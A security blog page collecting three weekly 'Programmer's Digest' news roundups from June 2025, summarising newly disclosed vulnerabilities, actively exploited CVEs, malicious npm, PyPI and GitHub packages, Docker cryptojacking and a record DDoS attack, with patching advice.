Rose debug info
---------------

Human Factor Blog

how human behavior affects security

Programmer’s Digest #140

06/18/2025-06/25/2025 200+ Trojanized GitHub Repositories, New Linux Flaws Grant Full Root Access, Hackers Exploit Misconfigured Docker APIs And More.

1. 200+ Trojanized GitHub Repositories Found in Campaign Targeting Gamers and Developers

Cybersecurity researchers have uncovered a malicious campaign involving over 67 GitHub repositories posing as Python-based hacking tools but delivering trojanized payloads. Dubbed Banana Squad by ReversingLabs, the campaign is linked to a 2023 effort that targeted the Python Package Index (PyPI) with similar tactics. These repositories impersonate popular tools like Discord cleaners, Fortnite cheats, and TikTok checkers, aiming to lure users searching for such software. Once downloaded, the payloads steal data, inject code into cryptocurrency apps, and establish remote access. The threat actors also abuse GitHub’s trust system by using fake stars and forks to boost visibility. Related campaigns like Water Curse and Stargazers Ghost Network exploit GitHub to distribute malware, often targeting gamers and novice hackers.

Sophos identified 133 repositories using techniques like Visual Studio PreBuild backdoors. The broader trend reflects a growing malware distribution model leveraging open-source platforms. Developers are urged to verify repository integrity before use.

2. New Linux Flaws Grant Full Root Access Across Major Distributions

Security researchers have discovered two major vulnerabilities in Linux that allow attackers to escalate privileges and gain full root access. The flaws (CVE-2025-6018 and CVE-2025-6019) impact major distributions including Ubuntu, Debian, Fedora, and openSUSE.Attackers can combine these flaws to escalate from a basic GUI or SSH session to full root access. The attack leverages udisks loop mounts and PAM quirks to bypass polkit trust zones.

Who Is Affected:

  • CVE-2025-6018 affects openSUSE Leap 15 and SUSE Linux Enterprise 15.
  • CVE-2025-6019 impacts libblockdev via the udisks daemon, which is installed by default on most Linux systems.

Once exploited, an attacker can disable security tools, install rootkits, or establish persistent access.

Patch Immediately: Linux vendors are releasing updates. Users should apply security patches as soon as possible, modify polkit rules for org.freedesktop.udisks2.modify-device, require auth_admin to block unauthorized actions.

3. Hackers Exploit Misconfigured Docker APIs to Mine Cryptocurrency via Tor Network

Misconfigured Docker instances are being exploited in a new cryptojacking campaign that uses the Tor network to hide attacker activity. Attackers abuse exposed Docker APIs to access containerized environments, deploy crypto miners, and mask their origin via Tor.

The attack begins with a request from IP 198.199.72[.]27 to list containers. If none exist, a new one is created using the “alpine” image, with the host’s root directory mounted inside—allowing dangerous access to the host system. A Base64-encoded script installs Tor and fetches a remote payload from a .onion domain. The attacker then modifies SSH settings to enable root login, installs tools like masscan and torsocks, and delivers an XMRig miner. All traffic is routed through Tor for anonymity. Targets include tech, finance, and healthcare sectors. Separately, Wiz found hundreds of leaked credentials in public code repositories, posing major risks to over 30 companies—including Fortune 100 firms.

4. Cloudflare Blocks Record 7.3 Tbps DDoS Attack Against Hosting Provider

In May 2025, Cloudflare mitigated a record-breaking DDoS attack that peaked at 7.3 Tbps—12% larger than the previous record. The 45-second attack targeted a hosting provider, generating 37.4 TB of traffic, equivalent to 7,500 hours of HD streaming.

The attack came from over 122,000 IPs across 161 countries, mainly Brazil, Vietnam, Taiwan, and China. It flooded multiple ports—peaking at 34,517 ports/second—using techniques like UDP floods, QOTD and Echo reflection, NTP amplification, and Mirai botnet traffic.

Cloudflare’s automated system, powered by its anycast network and real-time threat detection tools, handled the attack without human intervention, dispersing traffic across 477 global data centers.

Despite 99.996% of the traffic being UDP floods, other vectors probed for weaknesses. Indicators of compromise were added to Cloudflare’s free DDoS Botnet Threat Feed, now used by over 600 organizations.

5 d   digest   programmers'

Programmer’s Digest #139

06/11/2025-06/18/2025 Active Exploitation of Linux Kernel Privilege Escalation Vulnerability,Veeam Patches Critical Vulnerability And More.

1. CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability

CISA has added a Linux kernel vulnerability (CVE-2023-0386, CVSS 7.8) to its KEV catalog, warning it’s being actively exploited. The flaw, patched in early 2023, is an improper ownership bug in the OverlayFS subsystem that allows local privilege escalation. The issue arises when files are copied from a nosuid mount to another mount, letting unprivileged users escalate privileges by creating a root-owned SUID binary. Datadog called the exploit “trivial,” noting it abuses the kernel’s failure to properly check user namespace mappings.

While exact exploitation methods in the wild remain unclear, similar OverlayFS-related flaws—dubbed GameOver(lay)—have been detailed by cloud security firm Wiz, showing they can also grant root access on Unix systems. CISA has mandated all Federal Civilian Executive Branch agencies to apply patches by July 8, 2025, to defend against these active threats.

2. Veeam Patches Critical Vulnerability in Backup & Replication

Veeam has released patches for a critical vulnerability (CVE-2025-23120, CVSS 9.9) in its Backup & Replication software that could allow remote code execution (RCE) by authenticated domain users. The flaw affects version 12.3.0.310 and earlier builds. Users are urged to update to version 12.3.1 (build 12.3.1.1139).The issue stems from insecure deserialization within Veeam’s allow-list mechanism. Improper handling allows attackers to trigger inner deserialization using block-listed classes, enabling code execution.

The vulnerability is linked to CVE-2024-40711, exploited in ransomware attacks, and CVE-2024-42455, which allows arbitrary file deletion by authenticated users. Similar flaws may persist due to the software’s large codebase and weak authentication controls.Attackers could potentially exploit the flaw using modified proof-of-concept code. Veeam’s prior patches relied on block-listing, but deeper structural fixes may be needed.

3. Recent Langflow Vulnerability Exploited by Flodrix Botnet

Threat actors are exploiting CVE-2025-3248, a recently patched vulnerability in Langflow, to deploy the Flodrix botnet. The flaw—added to CISA’s KEV catalog in May—allows unauthenticated remote attackers to execute arbitrary code.

Langflow, a low-code AI workflow platform with over 70,000 GitHub stars, patched the issue in version 1.3.0 released in April. Proof-of-concept (PoC) exploits emerged shortly after, and attackers began scanning for exposed instances.

Trend Micro says the attackers use PoC exploits to gain shell access, perform reconnaissance, and then download and execute Flodrix malware. Once active, the bot connects to a command-and-control (C&C) server to await DDoS commands. Flodrix is an evolution of the LeetHozer malware, featuring enhanced obfuscation, new attack types, and stealth techniques to avoid detection.

GreyNoise has observed over 370 IPs exploiting the flaw, with Censys reporting 1,600 internet-exposed Langflow instances as of mid-June.

4. PyPI, npm, and AI Tools Exploited in Malware Surge Targeting DevOps and Cloud Environments

Researchers  have uncovered multiple malware-laced npm packages—such as eslint-config-airbnb-compat, ts-runtime-compat-check, and solders—designed to execute remote code and deliver layered payloads. These packages, now removed, were downloaded thousands of times.

One package used obfuscated scripts and Unicode tricks to install Pulsar RAT, a variant of Quasar RAT, hiding payloads within PNG image pixels. Another triggered code via a post-install script, running a PowerShell command that fetched further malware while evading detection.

Separately, Socket identified cryptocurrency-focused threats—stealers, drainers, and clippers—targeting blockchain projects. AI-assisted coding also introduced risks like slopsquatting, where LLMs hallucinate fake package names that attackers exploit by registering real ones.

Additionally, JFrog discovered chimera-sandbox-extensions on PyPI, a red teaming tool disguised as a helper module. It targeted developer credentials, CI/CD tokens, and macOS JAMF data, using domain generation and staged payloads for stealth.

12 d   digest   programmers'

Programmer’s Digest #138

06/04/2025-06/11/2025 CISA Adds RoundCube Webmail and Erlang Erlang/OTP SSH Server Flaws, Microsoft Patches 67 Vulnerabilities, New Supply Chain Malware Operation Hits npm and PyPI Ecosystems And More.

1. U.S. CISA Adds RoundCube Webmail and Erlang Erlang/OTP SSH Server Flaws to its Known Exploited Vulnerabilities Catalog

CISA has added two critical flaws—CVE-2025-32433 in Erlang/OTP and CVE-2024-42009 in RoundCube Webmail—to its KEV catalog.

CVE-2025-32433 (CVSS 10) affects older Erlang/OTP versions and allows remote code execution via its SSH server without authentication. Systems running versions before OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 are vulnerable. Users should update or disable the SSH server as a temporary fix. CVE-2024-42009 (CVSS 9.3), found by Sonar, is a severe XSS flaw in RoundCube, widely deployed via cPanel. Attackers can execute JavaScript when a victim views a malicious email, enabling email theft, unauthorized sending, and persistent browser access.

These vulnerabilities are actively exploited and must be patched promptly. CISA mandates FCEB agencies address them by the specified deadline, and private organizations are strongly urged to do the same.

2. Cisco Patches Identity Services Engine Flaw Affecting AWS, Azure, OCI

Cisco released patches on June 4 for a critical flaw (CVE-2025-20286) in cloud deployments of Cisco Identity Services Engine (ISE) on AWS, Azure, and Oracle Cloud. The vulnerability allows attackers to access sensitive data, perform limited admin actions, modify configurations, or disrupt services. No active exploitation has been reported yet.

The issue stems from shared admin keys across ISE instances in the same cloud platform and software version, enabling attackers to move laterally across tenants and regions once they compromise one credential. Experts call it a severe “chain-of-trust rupture” that risks widespread takeover.

Security leaders are urged to prioritize patching this flaw immediately. The risk highlights the ongoing challenge of common credentials in enterprise systems and stresses the importance of layered defenses and least-privilege access models to limit damage from breaches.

With multiple critical Cisco patches released recently, teams must focus on vulnerabilities that allow pre-auth access or remote code execution to cloud admin tiers first.

3. Microsoft Patches 67 Vulnerabilities Including WEBDAV Zero-Day Exploited in the Wild

Microsoft has released patches for 67 security flaws, including a critical zero-day (CVE-2025-33053) in WebDAV that is being actively exploited. The flaw allows remote code execution via a malicious URL and has been linked to the Stealth Falcon group, known for targeting Middle Eastern entities. Attackers used a .url file in phishing emails to deliver malware, including a C++ implant named Horus Agent. This tool collects data, downloads files, and injects shellcode. Microsoft also addressed a major Power Automate flaw (CVE-2025-47966) and other significant bugs in Netlogon, SMB, and KDC Proxy. The U.S. CISA has added CVE-2025-33053 to its KEV catalog, mandating federal agencies to patch it by July 1, 2025. CERT/CC also warned about UEFI vulnerabilities that could bypass Secure Boot, allowing malicious code to persist below the OS level. While Microsoft is unaffected by some of these, they pose risks to many UEFI-compliant systems.

4. Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps

Adobe has released patches for 254 security flaws across its software, with 225 affecting Adobe Experience Manager (AEM). These vulnerabilities, mostly stored and DOM-based cross-site scripting (XSS), impact AEM Cloud Service and versions up to 6.5.22. Exploitation could lead to code execution, privilege escalation, or bypassing security features. The issues are fixed in AEM Cloud Service Release 2025.5 and 6.5.23.

Adobe also addressed a critical reflected XSS flaw (CVE-2025-47110, CVSS 9.1) in Adobe Commerce and Magento Open Source that allows arbitrary code execution, along with an improper authorization issue (CVE-2025-43585, CVSS 8.2).

Additional fixes include code execution bugs in InCopy and Substance 3D Sampler. Although none of the flaws are known to be exploited in the wild, Adobe strongly recommends updating to the latest versions to stay protected.

5. Researchers Uncover 20+ Configuration Risks, Including Five CVEs, in Salesforce Industry Cloud

Researchers have uncovered over 20 misconfiguration risks in Salesforce Industry Cloud, exposing sensitive data to unauthorized access. These flaws affect components like FlexCards, Data Mappers, OmniOut, and OmniScripts. Most issues stem from improper customer configurations, not the platform itself.

If unaddressed, the flaws could allow attackers to access encrypted employee and customer data, session details, credentials, and business logic. Salesforce has patched the issues and issued updated configuration guidance.

Key vulnerabilities include exposure of encrypted fields due to missing permission checks (CVE-2025-43697, CVE-2025-43700), guest user access to sensitive settings (CVE-2025-43701), and improper enforcement of required permissions (CVE-2025-43699). A new setting, “EnforceDMFLSAndDataEncryption,” helps mitigate some risks.

Separately, a SQL injection flaw in a default Aura controller could allow attackers to extract database contents. Salesforce confirmed the issue was patched promptly with no signs of exploitation.

 

6. New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally

Cybersecurity researchers have uncovered a supply chain attack targeting over a dozen GlueStack-related npm packages, introducing malware that allows attackers to run shell commands, take screenshots, and upload files. These packages collectively see nearly 1 million weekly downloads. The first compromise was detected on June 6, 2025. The injected malware, similar to a recent trojan from another npm package, supports new commands to harvest system info and public IP addresses.

Maintainers revoked access tokens and deprecated affected versions. They say the risk of code execution on user systems is low since the affected libraries are frontend-only, but users should still roll back to safe versions. Separately, two malicious npm packages—express-api-sync and system-health-sync-api—were found containing destructive wipers that delete files and steal data, using SMTP for stealthy exfiltration. Additionally, a Python package on PyPI masquerading as an Instagram growth tool harvests credentials and spreads them to bot services, emphasizing the growing threat in software supply chains.

19 d   digest   programmers'
Earlier Ctrl + ↓